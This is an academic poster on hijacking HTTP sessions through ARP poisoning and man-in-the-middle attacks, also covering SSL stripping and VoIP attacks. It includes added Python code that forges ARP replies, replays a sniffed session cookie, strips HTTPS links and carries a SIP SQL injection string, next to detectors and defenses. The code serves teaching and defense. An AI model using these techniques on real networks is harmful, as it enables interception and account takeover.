Demonstrating HTTP Session Hijacking through ARP Cache Poisoning and Man-in-the-Middle Attack and exploring HTTPS and VoIP session vulnerabilities
Mainuddin Ahmad Jonas and Risul Islam
Email: [email protected] and [email protected]
Department of Computer Science and Engineering (CSE), BUET
What is Session Hijacking?
A session is a lasting, stateful exchange between a user's browser and a server spanning many HTTP requests.
The Session ID is a unique identifier, usually carried in a cookie, that the client presents on every request so that the server can associate the request with the session data it stores.
Session Hijacking is the exploitation of a valid session: an attacker takes over an established session between a client and a server. It is done by stealing the Session ID and presenting it as one's own, since the server identifies the user by nothing else.
How an HTTP session can be Hijacked
Any unencrypted HTTP session can be hijacked by an attacker who can observe the traffic, for example by launching a Man-in-the-Middle attack on the local network segment. Three steps are involved:
1. Poisoning the ARP cache
2. Sniffing the Session ID
3. Hijacking the session using the stolen Session ID
Poisoning the ARP Cache
Ettercap is used to poison the ARP cache. In the demonstration the client IP address is 192.168.1.102, the default gateway is 192.168.1.1 and the attacker machine is 192.168.1.103.
After the attack, all traffic between the client and the default gateway passes through the attacker's machine: the client's ARP cache now maps the gateway's IP address to the attacker's MAC address, and the gateway's ARP cache maps the client's IP address to the attacker's MAC address. ARP replies carry no authentication, so any host on the same broadcast domain can send these forged mappings.
Fig. 1: Poisoning the ARP cache using Ettercap
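The two forged replies that produce the state described above, as an added example that is not the poster's code and does not use Ettercap: it hand-builds the Ethernet/ARP frames with Python's standard library, decodes them back, and runs a small passive detector of the kind a defender would place on the same segment. The three IP addresses are the poster's; the MAC addresses are assumed.

```python
"""ARP cache poisoning as raw frames, plus a passive detector.

Added example, not the poster's tool or Ettercap. It builds the two unsolicited
ARP replies a bidirectional poisoning (Ettercap's arp:remote) sends, parses them
back, and flags an IP whose MAC mapping changes. MACs are assumed values; only
the three IP addresses come from the poster.
"""
import ipaddress
import struct

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2

# Assumed MACs for the three hosts named on the poster (constructed data).
CLIENT_IP, CLIENT_MAC = "192.168.1.102", "00:11:22:33:44:02"
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:11:22:33:44:01"
ATTACKER_IP, ATTACKER_MAC = "192.168.1.103", "00:11:22:33:44:03"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(sender_ip, sender_mac, target_ip, target_mac) -> bytes:
    """Ethernet II frame carrying an ARP reply 'sender_ip is-at sender_mac'.

    It is sent without a preceding request; hosts still update their cache
    because ARP has neither authentication nor request tracking."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,                       # hardware type: Ethernet
        0x0800,                  # protocol type: IPv4
        6, 4,                    # hardware / protocol address lengths
        ARP_REPLY,
        mac_bytes(sender_mac), ipaddress.ip_address(sender_ip).packed,
        mac_bytes(target_mac), ipaddress.ip_address(target_ip).packed,
    )
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame into its fields."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {
        "op": op,
        "sender_mac": mac_str(sha), "sender_ip": str(ipaddress.ip_address(spa)),
        "target_mac": mac_str(tha), "target_ip": str(ipaddress.ip_address(tpa)),
    }


def poison_frames() -> list:
    """The two replies that put the attacker between client and gateway:
    tell the client the gateway IP lives at the attacker's MAC, and tell the
    gateway the client IP lives at the attacker's MAC."""
    return [
        build_arp_reply(GATEWAY_IP, ATTACKER_MAC, CLIENT_IP, CLIENT_MAC),
        build_arp_reply(CLIENT_IP, ATTACKER_MAC, GATEWAY_IP, GATEWAY_MAC),
    ]


class ArpWatch:
    """Passive detector in the style of arpwatch: remember the first MAC seen
    for each IP and report any reply that claims a different one."""

    def __init__(self):
        self.table = {}

    def observe(self, frame: bytes):
        p = parse_arp(frame)
        if p["op"] != ARP_REPLY:
            return None
        known = self.table.setdefault(p["sender_ip"], p["sender_mac"])
        if known != p["sender_mac"]:
            return f"ALERT {p['sender_ip']} moved from {known} to {p['sender_mac']}"
        return None


def demo() -> list:
    """Constructed sequence: a genuine reply from the real gateway, then the
    two poison frames. Returns the alerts the watcher raised."""
    watch = ArpWatch()
    legit = build_arp_reply(GATEWAY_IP, GATEWAY_MAC, CLIENT_IP, CLIENT_MAC)
    alerts = [watch.observe(legit)] + [watch.observe(f) for f in poison_frames()]
    return [a for a in alerts if a]


if __name__ == "__main__":
    for f in poison_frames():
        print(parse_arp(f))
    print(demo())
```

Putting the frames on the wire needs a raw socket with CAP_NET_RAW (socket.AF_PACKET on Linux), which is left out so the block runs anywhere. Ettercap re-sends the replies at regular intervals because ARP cache entries expire; that repetition is also what makes the watcher's "moved" alerts so regular on a poisoned segment.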
Sniffing the Session ID
After establishing the MITM position, the Session ID can be stolen using any packet sniffer, because HTTP sends the cookie in plaintext on every request.
In Fig. 2, we have shown the use of Wireshark filters to capture the relevant HTTP traffic from our victim machine.
In Fig. 3, the captured traffic is inspected to find the secret Session ID of the current session.
Fig. 2: Using Wireshark filters to capture HTTP cookies sent from our victim machine
Fig. 3: Inspecting the Session ID from the captured packets. Here we can see the Session ID is 17F0B4417EB65A8066A3ECF241588283.tomcat3
Hijacking the Session with the stolen Session ID
Using the stolen Session ID, it is easy to gain access to a valid logged-in session: the server identifies the user only by the cookie value, so any client that presents it is treated as that user.
Fig. 4 shows a Firefox add-on (Cookies Manager+) being used to hijack the session.
We are building an automated tool to carry out all three steps.
Fig. 4: Using Cookies Manager+ to hijack the session. Here we insert the Session ID we sniffed in the previous step
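Steps 2 and 3 worked end to end, as an added example rather than the authors' tool: a captured request (constructed here around the Session ID from Fig. 3) is parsed the way Wireshark's http.cookie field displays it, the Set-Cookie header is checked for the Secure attribute whose absence lets the cookie travel over plain HTTP, and the stolen value is replayed against a stand-in server started on localhost so the run is self-contained. The cookie name JSESSIONID, the host name and the paths are assumptions.

```python
"""Steps 2 and 3: recover the session cookie from captured plaintext HTTP,
then replay it. Added example; the capture and the server are constructed
stand-ins, the Session ID is the one shown in Fig. 3 of the poster."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

STOLEN_ID = "17F0B4417EB65A8066A3ECF241588283.tomcat3"

# Constructed: one victim request as a sniffer sees it on the wire.
CAPTURED_REQUEST = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Cookie: lang=en; JSESSIONID=" + STOLEN_ID.encode() + b"; theme=dark\r\n"
    b"\r\n"
)
# Constructed: the earlier response that issued the cookie.
CAPTURED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: JSESSIONID=" + STOLEN_ID.encode() + b"; Path=/; HttpOnly\r\n"
    b"Content-Length: 0\r\n\r\n"
)


def header_lines(raw: bytes):
    """Yield (name, value) for each header of a raw request or response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        yield name.strip().lower(), value.strip()


def parse_cookie_header(value: str) -> dict:
    """'a=1; b=2' -> {'a': '1', 'b': '2'}, i.e. the browser's Cookie header."""
    pairs = (p.strip().partition("=") for p in value.split(";") if p.strip())
    return {k: v for k, _, v in pairs}


def extract_cookies(raw: bytes) -> dict:
    """Step 2: the same fields Wireshark shows under http.cookie."""
    return next((parse_cookie_header(v) for n, v in header_lines(raw) if n == "cookie"), {})


def set_cookie_attributes(raw: bytes, name: str) -> set:
    """Attribute names on the Set-Cookie header for `name`. Without 'secure'
    the browser also sends the cookie over plain HTTP, which is what makes
    the sniffing step possible."""
    for n, v in header_lines(raw):
        if n == "set-cookie" and v.startswith(name + "="):
            return {a.strip().split("=")[0].lower() for a in v.split(";")[1:]}
    return set()


class SessionServer(BaseHTTPRequestHandler):
    """Stand-in for the victim's application: identity is whatever the
    JSESSIONID cookie maps to; nothing else is checked."""
    SESSIONS = {STOLEN_ID: "victim"}

    def do_GET(self):
        cookies = parse_cookie_header(self.headers.get("Cookie", ""))
        user = self.SESSIONS.get(cookies.get("JSESSIONID", ""))
        body = f"Welcome back, {user}".encode() if user else b"Please log in"
        self.send_response(200 if user else 401)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def replay(host: str, port: int, session_id: str, path: str = "/account"):
    """Step 3: present the stolen cookie as our own, which is what
    Cookies Manager+ does inside the browser. Returns (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    headers = {"Cookie": f"JSESSIONID={session_id}"} if session_id else {}
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, body


def demo():
    """Sniff the ID from the capture, then replay it against the stand-in.
    Returns (hijacked result, cookieless result)."""
    sid = extract_cookies(CAPTURED_REQUEST)["JSESSIONID"]
    srv = ThreadingHTTPServer(("127.0.0.1", 0), SessionServer)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        port = srv.server_port
        return replay("127.0.0.1", port, sid), replay("127.0.0.1", port, "")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The replay with the stolen cookie returns 200 and the victim's page; the same request without it gets 401. HttpOnly on the cookie does not help here: it blocks script access inside the browser, not observation on the wire. Only the Secure attribute, on a site that is served over HTTPS only, keeps the value off plain HTTP.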
HTTPS Protocol and its Vulnerabilities
Because of the inherent weaknesses of the HTTP protocol demonstrated above, an HTTPS connection is recommended. However, even HTTPS is not secure from all MITM attacks: weaknesses in how the SSL handshake is validated, together with oversight by end users, can be exploited.
The SSL handshake is exchanged in plaintext and the server is identified only by the certificate it presents, so a man-in-the-middle can terminate the client's connection with a spoofed certificate of its own. If the user clicks through the browser's certificate warning, the attacker holds the session keys on both sides and can read the traffic. Attacks of this kind are known as SSL Sniffing attacks.
In SSL Stripping, the man-in-the-middle attacker keeps an SSL connection to the server but strips SSL from what the client sees: it rewrites the https:// redirects and links in the server's response to http:// and sends the client a normal HTTP response. The client never negotiates SSL at all, so no certificate warning appears, and the attacker reads everything in the clear.
HProxy, HSTS, SSLock, HTTPSLock and ISAN Enforcer are proposed solutions to SSL Stripping.
We are currently in the process of developing a better method of preventing SSL Stripping attacks.
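The stripping rewrite and the HSTS policy store that defeats it, as an added example that is not the authors' method or any existing tool. strip_response does what the attacker's proxy does to a reply it relays; HstsCache models the browser's store, which upgrades later http:// navigations before any packet leaves the machine. The server reply, the host names and the URLs are constructed.

```python
"""SSL stripping as the MITM performs it, and the client-side HSTS store
that stops it for a client that has seen the real site before. Added
example; the response, host and URLs are constructed."""
import re
import time
from urllib.parse import urlsplit, urlunsplit

HOST = "bank.example"  # assumed victim site

# Constructed: the server's reply as it arrives on the MITM's HTTPS leg.
BODY = (
    b'<a href="https://bank.example/login">Log in</a>\n'
    b'<form action="https://bank.example/transfer" method="post"></form>\n'
)
SERVER_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n\r\n" + BODY
)


def split_response(raw: bytes):
    """(status line, [(name, value)], body) from a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = [tuple(s.strip() for s in line.split(b":", 1)) for line in lines[1:]]
    return lines[0], headers, body


def strip_response(raw: bytes):
    """The attacker's rewrite before relaying the reply over plain HTTP:
    remove the HSTS header so the client never learns the policy, and turn
    every https:// reference (links, forms, Location) into http://.
    Returns the stripped bytes and the URLs that were downgraded, which the
    proxy upgrades back to https:// when the client follows them."""
    status, headers, body = split_response(raw)
    downgraded = {m.decode() for m in re.findall(rb"https://[^\s\"'<>]+", body)}
    new_body = body.replace(b"https://", b"http://")
    out = [status]
    for name, value in headers:
        lname = name.lower()
        if lname == b"strict-transport-security":
            continue
        if lname == b"location":
            value = value.replace(b"https://", b"http://")
        if lname == b"content-length":
            value = str(len(new_body)).encode()
        out.append(name + b": " + value)
    return b"\r\n".join(out) + b"\r\n\r\n" + new_body, downgraded


class HstsCache:
    """The browser's HSTS store. Feed it only responses received over HTTPS
    with a valid certificate (the spec ignores the header over plain HTTP).
    Once a host has a policy, every later http:// navigation to it is
    rewritten to https:// locally, so a stripped link is never followed in
    the clear."""

    def __init__(self):
        self.policies = {}  # host -> (expiry time, includeSubDomains)

    def observe(self, host: str, raw: bytes, now=None):
        now = time.time() if now is None else now
        for name, value in split_response(raw)[1]:
            if name.lower() != b"strict-transport-security":
                continue
            directives = [d.strip().lower() for d in value.decode().split(";")]
            max_age = next((int(d.split("=", 1)[1]) for d in directives
                            if d.startswith("max-age=")), 0)
            if max_age == 0:
                self.policies.pop(host, None)  # max-age=0 clears the policy
            else:
                self.policies[host] = (now + max_age, "includesubdomains" in directives)

    def covered(self, host: str, now=None) -> bool:
        now = time.time() if now is None else now
        labels = host.split(".")
        for i in range(len(labels)):  # exact host, then each parent domain
            policy = self.policies.get(".".join(labels[i:]))
            if policy and policy[0] > now and (i == 0 or policy[1]):
                return True
        return False

    def rewrite(self, url: str, now=None) -> str:
        parts = urlsplit(url)
        if parts.scheme == "http" and self.covered(parts.hostname, now):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


def demo():
    """A first-time visitor through the MITM versus a returning one."""
    stripped, _ = strip_response(SERVER_RESPONSE)
    link = "http://bank.example/login"     # what the stripped page offers
    first_visit = HstsCache()              # never reached the real site
    first_visit.observe(HOST, stripped)    # nothing to learn: header removed
    returning = HstsCache()                # saw the real site over HTTPS earlier
    returning.observe(HOST, SERVER_RESPONSE)
    return first_visit.rewrite(link), returning.rewrite(link)


if __name__ == "__main__":
    print(demo())
```

The first-visit problem is visible in demo(): a client that has never reached the real site over HTTPS has no policy to enforce and follows the http:// link, which is the gap that browser HSTS preload lists exist to close. A returning client rewrites the stripped link back to https:// before sending anything, so the request never goes out in the clear.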
VoIP (Voice over Internet Protocol)
• A set of protocols, with SIP as the signalling protocol considered here, that is now widely used in the telephony system.
• The number of residential VoIP subscribers in the US is 44 million (IDC report, 2010).
• Most people consider VoIP safe, but it is becoming increasingly vulnerable.
• The figure shows the communication process.
Fig. 5: Communication in VoIP
Attacks on VoIP and Prevention
• Man In The Middle (MITM) attack
– A Remote Attacker (RA) acts as the SIP Proxy Server (PS) towards a SIP Phone and as the SIP Phone towards the PS, relaying and observing the signalling between them.
• DoS attack: making the VoIP service stop or degrade. Two types:
– SIP Parser attack: sending a malformed INVITE message that the proxy's parser cannot handle
– Flooding attack: overwhelming the PS with INVITE messages
• SQL injection: injecting SQL statements into an INVITE message header that the proxy passes to its database without sanitising it
Prevention of VoIP attacks:
No. | Attack | Defense mechanism | Properties | Further attacks
1 | MITM | Using a dynamic ID value and a wide range of port numbers in the DNS query | No brute-force search by the RA; burdensome, takes time | Possible by brute-force search and sniffing
2A | SIP Parser (DoS) | Strong message header checking | No harmful header; no multiple connections | Not possible
2B | Flooding (DoS) | Allowing the PS a maximum number of hits per second from a SIP Phone | Flooding limited from a single phone; poor service | Still possible by DDoS
3 | SQL Injection | Strong message header checking | No harmful header; computational burden | Still possible but limited
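The two defenses the table relies on, strong header checking for the SIP Parser and SQL Injection rows and a per-phone rate limit for the Flooding row, as an added example implemented on the proxy side. This is not the authors' defense or any SIP stack's code; the INVITE messages are constructed, the header rules are a strict subset of what RFC 3261 requires of an INVITE, and the limit of 5 INVITEs per second is an assumed figure.

```python
"""Proxy-side checks for the three VoIP attacks in the table: strict INVITE
header checking (parser attack, SQL injection rows) and a per-phone rate
limit (flooding row). Added example; messages and the limit are constructed."""
import re

REQUIRED = ("via", "from", "to", "call-id", "cseq", "max-forwards")
# A SIP URI as used in From/To/Request-URI: sip:user@host[:port]
URI_RE = re.compile(r"^sip:[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+(:\d{1,5})?$")
# SQL string/comment delimiters and keywords that have no place in a SIP header
# value (';' is deliberately allowed: it separates legitimate header parameters).
SQL_RE = re.compile(r"('|--|/\*|\b(union|select|insert|update|delete|drop)\b)", re.I)


def parse_invite(msg: str) -> dict:
    """Parse and strictly validate an INVITE. Raises ValueError on anything a
    lenient parser might choke on or pass through to a database."""
    head = msg.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    req = lines[0].split(" ")
    if len(req) != 3 or req[0] != "INVITE" or req[2] != "SIP/2.0" or not URI_RE.match(req[1]):
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep or not name.strip().replace("-", "").isalpha():
            raise ValueError(f"malformed header: {line!r}")
        name, value = name.strip().lower(), value.strip()
        if len(value) > 256 or not value.isprintable():
            raise ValueError(f"oversized or non-printable value in {name}")
        if SQL_RE.search(value):
            raise ValueError(f"SQL metacharacters in {name}")
        headers[name] = value
    missing = [h for h in REQUIRED if h not in headers]
    if missing:
        raise ValueError(f"missing headers: {missing}")
    for h in ("from", "to"):
        uri = re.search(r"<(sip:[^>]+)>", headers[h]) or re.match(r"(sip:\S+)", headers[h])
        if not uri or not URI_RE.match(uri.group(1)):
            raise ValueError(f"bad URI in {h}")
    if not re.fullmatch(r"\d+ INVITE", headers["cseq"]):
        raise ValueError("bad CSeq")
    return {"uri": req[1], **headers}


class InviteRateLimiter:
    """Sliding one-second window per source phone (table row 2B)."""

    def __init__(self, max_per_second: int = 5):  # assumed limit
        self.limit = max_per_second
        self.seen = {}  # source -> timestamps within the last second

    def allow(self, source: str, now: float) -> bool:
        window = [t for t in self.seen.get(source, []) if now - t < 1.0]
        if len(window) < self.limit:
            window.append(now)
        self.seen[source] = window
        return len(window) <= self.limit and window and window[-1] == now


def handle(msg: str, source: str, limiter: InviteRateLimiter, now: float) -> str:
    """Decision the proxy takes for one incoming INVITE from `source`."""
    if not limiter.allow(source, now):
        return "503 Service Unavailable (rate limited)"
    try:
        parse_invite(msg)
    except ValueError as e:
        return f"400 Bad Request ({e})"
    return "100 Trying"


# Constructed messages. GOOD_INVITE follows the RFC 3261 example layout.
GOOD_INVITE = (
    "INVITE sip:bob@192.168.1.1 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.102:5060;branch=z9hG4bK776asdhds\r\n"
    "Max-Forwards: 70\r\n"
    'From: "Alice" <sip:alice@192.168.1.102>;tag=1928301774\r\n'
    "To: <sip:bob@192.168.1.1>\r\n"
    "Call-ID: a84b4c76e66710@192.168.1.102\r\n"
    "CSeq: 314159 INVITE\r\n"
    "Content-Length: 0\r\n\r\n"
)
# Parser attack: version glued to the URI and a header line with no colon.
MALFORMED_INVITE = GOOD_INVITE.replace(" SIP/2.0\r\n", "SIP/2.0\r\n", 1).replace(
    "Max-Forwards: 70", "Max-Forwards 70")
# SQL injection: payload in the From display name, aimed at a proxy that
# looks the caller up with an unparameterised query.
INJECTED_INVITE = GOOD_INVITE.replace('"Alice"', "\"Alice' OR '1'='1\"")

if __name__ == "__main__":
    lim = InviteRateLimiter()
    for m in (GOOD_INVITE, MALFORMED_INVITE, INJECTED_INVITE):
        print(handle(m, "192.168.1.102", lim, 100.0))
```

Rejecting on the first SQL metacharacter is the cheap check that the table's "computational burden" refers to; the proper fix on the proxy is never to concatenate header values into queries, so a parameterised lookup removes the injection row regardless of what the header contains. The limiter keys on the source phone, which is exactly why the table notes that a distributed flood still gets through.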